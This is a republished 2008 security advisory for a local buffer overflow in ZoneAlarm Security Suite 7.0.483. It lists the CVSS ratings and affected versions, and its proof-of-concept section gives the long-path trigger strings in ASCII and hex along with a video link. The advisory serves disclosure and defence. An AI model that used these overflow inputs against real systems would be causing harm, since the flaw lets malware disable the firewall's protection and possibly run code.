ZoneAlarm Security Suite buffer overflow

2008.09.11
Credit: jplopezy
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 6.9/10
Impact Subscore: 10/10
Exploitability Subscore: 3.4/10
Exploit range: Local
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Application: ZoneAlarm Security Suite OS: Windows Xp (All patches a day) ------------------------------------------------------ 1 - Description 2 - Vulnerability 3 - POC/EXPLOIT ------------------------------------------------------ Description The zonealarm is a known firewall, which in the version "security suite" brings some tools as an antivirus, antispam and so on. Details of the version ZoneAlarm Security Suite versin:7.0.483.000 Versin de TrueVector:7.0.483.000 Versin del controlador:7.0.483.000 Versin de motor anti-virus:3 Versin de motor antivirus:5.0.1.85 Versin de archivo DAT de firma de anti-virus 915051681 Versin de motor de proteccin contra programas espa:5.0.189.0 Versin de archivo DAT de firma de proteccin contra programas espa 01.200801.3195 Versin de AntiSpam 5.0.6.8903 ------------------------------------------------------ Vulnerability The vulnerability is caused because the program can not analyze very long paths. This causes a buffer overflow with the possibility of execution of code. The flaw could be exploited by malware to leave without protection to the system for instance. ------------------------------------------------------ POC/EXPLOIT Here you can view a video proof of concept http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf Strings ASCII: · � AAAAAAAAAAAAAAAAAAA · � AAAAAAAAAAAAAAAAAAA · � AAAAAAAAAAAAAAAAAAA · · � AAAAAAAAAAAAAAAAAAA · � AAAAAAAAAAAAAAAAAAA · � AAAAAAAAAAAAAAAAAAA · · � A · � AAAAAAAAAAAAAAAAAAA · � AAAAAAAAAAAAAAAAAAA HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 ASCII: �����������AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 ------------------------------------------------------ Juan Pablo Lopez Yacubian

References:

http://xforce.iss.net/xforce/xfdb/45082
http://www.vupen.com/english/advisories/2008/2556
http://www.securitytracker.com/id?1020859
http://www.securityfocus.com/bid/31124
http://www.securityfocus.com/archive/1/archive/1/496226/100/0/threaded
http://secunia.com/advisories/31832
http://osvdb.org/48097


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top